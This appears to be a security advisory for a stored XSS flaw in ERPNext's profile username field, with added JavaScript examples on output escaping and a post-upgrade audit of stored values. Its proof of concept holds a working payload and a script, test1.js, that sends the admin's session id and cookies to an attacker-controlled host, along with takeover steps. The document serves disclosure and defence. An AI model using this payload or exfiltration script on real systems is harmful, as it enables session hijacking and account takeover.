

Date: June 22, 2022


In ERPNext, versions v12.0.9 through v13.0.3 are vulnerable to Stored Cross-Site Scripting (XSS) because user input is not validated properly. A low-privileged attacker can inject arbitrary script into input fields when editing their own profile.


ERPNext is affected by a stored XSS vulnerability that allows low-privileged users to store malicious scripts in the ‘username’ field under ‘My Settings’.
The script executes in a victim’s browser whenever the victim opens a page that renders the stored field. Because the victim can be a highly privileged user such as an administrator, the injected script can extract the session id (‘sid’) from the page and read every cookie exposed to script, which leads to full account takeover and privilege escalation. The advisory also reports an availability impact: once the JavaScript payload is stored on the server, the victim can no longer browse the platform normally, since every page that renders the field runs the payload.

PoC Details

1. Log in to the application as a low-privileged user.
2. Open the settings menu in the navigation bar and select My Settings.
3. Enter the malicious script (see PoC Code below) in the ‘username’ field and click Save.
4. On the attacker host, create a file named ‘test1.js’ with the content below and serve it over HTTP (for example with Python’s built-in http.server, which also logs the query string of every request it receives).

the content of the ‘test1.js’ file:
// The session id is written into the page source as "sid": "<value>", so it is
// read from there rather than from document.cookie.
var re = /\"sid\":\s\"[0-9a-zA-Z]+\"/gm;
var te = /[0-9a-zA-Z]+/gm;

// match() returns the full match, e.g. '"sid": "abc123"'; keep the value after ':'
var getSID = (document.documentElement.innerHTML).match(re);
getSID = getSID[0].split(':');
getSID = getSID[1].match(te);

// Send the sid and every cookie readable by script to the attacker's listener;
// the request only goes out once the script element is attached to the document.
var url = 'http://[attacker-ip]:[attacker-port]/?sid=' + getSID;
var script = document.createElement('script');
script.src = url + '&details=' + encodeURIComponent(document.cookie);
document.body.appendChild(script);

5. In a separate (Incognito) browser session, log in to the same ERPNext instance as a high-privileged user and open a page that renders the stored ‘username’ value. The browser loads test1.js from the attacker’s server.
6. The ‘sid’ value and the readable cookies arrive at the attacker’s listener. Setting that ‘sid’ as the session cookie in the attacker’s own browser logs them in as the administrator without a password.

PoC Code

<!--</SCRIPT><script src=http://<attacker-ip>:<port>/test1.js></script>-->
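Why the payload above works, and the two output-encoding rules that would have neutralised it, as an added example in JavaScript. It is not ERPNext or Frappe code: the renderNavbar*/embedBoot* helpers are hypothetical stand-ins for a template that prints the logged-in user’s name, and attacker.example:8000 is a placeholder host.

```javascript
// Added example, not ERPNext/Frappe code: how an unescaped profile field
// becomes stored XSS, and the two escaping rules that neutralise it.
// renderNavbar*/embedBoot* are hypothetical stand-ins for server-side
// templates that print the logged-in user's name; PAYLOAD is the PoC string
// with a placeholder attacker host (assumed, not from the advisory).

const PAYLOAD =
  '<!--</SCRIPT><script src=http://attacker.example:8000/test1.js></script>-->';

// Vulnerable: the stored value is concatenated into HTML unchanged.
function renderNavbarUnsafe(username) {
  return '<span class="user-name">' + username + '</span>';
}

// Rule 1: text placed between tags or inside quoted attributes is HTML-escaped.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

function renderNavbarSafe(username) {
  return '<span class="user-name">' + escapeHtml(username) + '</span>';
}

// Vulnerable: user data serialised into an inline <script> block. JSON.stringify
// leaves '<' alone, so a stored "</SCRIPT>" ends the script element early and
// the rest of the value is parsed as HTML, which is what the PoC payload relies on.
function embedBootUnsafe(boot) {
  return '<script>var boot = ' + JSON.stringify(boot) + ';</script>';
}

// Rule 2: inside a script block, escape '<' as the JSON/JS escape \u003c. The
// value still parses to the same string, but the HTML parser never sees a tag.
function embedBootSafe(boot) {
  return '<script>var boot = ' + JSON.stringify(boot).replace(/</g, '\\u003c') + ';</script>';
}

// Number of "</script" sequences the HTML parser would treat as end tags.
function countScriptEndTags(html) {
  return (html.toLowerCase().match(/<\/script/g) || []).length;
}

// Defence in depth on input: a display-name field has no business containing markup.
function containsMarkup(value) {
  return /[<>]/.test(String(value));
}

// Recover the JSON written by embedBoot* to show that the safe form round-trips.
function parseEmbeddedBoot(html) {
  const m = html.match(/var boot = (.*);<\/script>$/s);
  return m ? JSON.parse(m[1]) : null;
}

console.log(renderNavbarSafe(PAYLOAD));
console.log('end tags, unsafe:', countScriptEndTags(embedBootUnsafe({ username: PAYLOAD })));
console.log('end tags, safe:  ', countScriptEndTags(embedBootSafe({ username: PAYLOAD })));
```

The leading `</SCRIPT>` in the payload matters in the second situation: when a value is printed raw inside an inline script, the HTML parser ends that script at the first `</script` it meets (case-insensitively), regardless of JavaScript string quoting, and the `<script src=...>` that follows is then parsed as ordinary markup. The `<!--` and `-->` markers hide whatever fragments of the original markup land before and after the injected tag so the page still parses cleanly. Escape on output for the context the value lands in; the input check is a useful extra for fields like ‘username’, but it is not a substitute.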

Affected Environments

ERPNext versions v12.0.9 through v13.0.3


Remediation

Upgrade to ERPNext version 13.1.0.
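Upgrading fixes the rendering, but the advisory says nothing about values already stored in the database, and a stored payload is also the evidence of who planted it and when. The following is an added incident-response example in JavaScript, not ERPNext or Frappe code: it audits profile fields for markup over constructed rows shaped like User records (Frappe’s standard name/modified/modified_by metadata plus profile fields; the list of editable fields is assumed and should be adjusted to your version). Real rows would be pulled through the Frappe API or SQL.

```javascript
// Added example, not ERPNext/Frappe code: post-upgrade audit of stored
// profile fields. Rows are constructed to resemble User records; the field
// list and 203.0.113.5 (a documentation address) are assumptions.

// Values that should never appear in a display-name field.
const SUSPICIOUS = /<|>|javascript:|\bon[a-z]+\s*=/i;

// Profile fields a low-privileged user can edit (assumed; adjust to your version).
const PROFILE_FIELDS = ['username', 'full_name', 'first_name', 'last_name'];

// Constructed sample data.
const sampleUsers = [
  { name: 'alice@example.com', username: 'alice', full_name: 'Alice Example',
    first_name: 'Alice', last_name: 'Example',
    modified: '2022-06-01 10:00:00', modified_by: 'alice@example.com' },
  { name: 'mallory@example.com',
    username: '<!--</SCRIPT><script src=http://203.0.113.5:8000/test1.js></script>-->',
    full_name: 'Mallory', first_name: 'Mallory', last_name: '',
    modified: '2022-06-20 22:15:03', modified_by: 'mallory@example.com' },
  { name: 'bob@example.com', username: 'bob', full_name: "Bob O'Neil",
    first_name: 'Bob', last_name: "O'Neil",
    modified: '2022-05-30 08:12:44', modified_by: 'admin@example.com' },
];

// One finding per (user, field) whose value looks like markup. modified_by is
// the last editor of the record, which is the attacker when they saved the
// field themselves; consult change-tracking history if an admin edited it later.
function auditUsers(rows, fields = PROFILE_FIELDS) {
  const findings = [];
  for (const row of rows) {
    for (const field of fields) {
      const value = row[field];
      if (typeof value === 'string' && SUSPICIOUS.test(value)) {
        findings.push({
          user: row.name,
          field,
          excerpt: value.slice(0, 60),
          planted_by: row.modified_by,
          planted_at: row.modified,
        });
      }
    }
  }
  return findings;
}

// Any privileged session active after the earliest planting time may have had
// its sid exfiltrated; use this timestamp as the cut-off for revoking sessions.
function earliestPlantedAt(findings) {
  return findings.map((f) => f.planted_at).sort()[0] || null;
}

const findings = auditUsers(sampleUsers);
console.log(JSON.stringify(findings, null, 2));
console.log('revoke privileged sessions active since:', earliestPlantedAt(findings));
```

A hit gives you the attacker account and the time window. Remove the stored value, disable the account, revoke every session of privileged users that was active after the planting time, rotate their passwords, and review what those sessions did, since a captured ‘sid’ is a full login without a password.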

Language: Python

Weakness class: Cross-Site Scripting (XSS)

CVSS v3 Base Score: 5.4 (Medium), computed from the vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None

CVSS v2 Base Score: 3.5, computed from the vector AV:N/AC:M/Au:S/C:N/I:P/A:N
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (Au): Single
Confidentiality (C): None
Integrity (I): Partial
Availability (A): None

Both vectors rate Availability as None, even though the description above claims the stored payload stops the victim from browsing the platform; the availability claim is not reflected in the scores.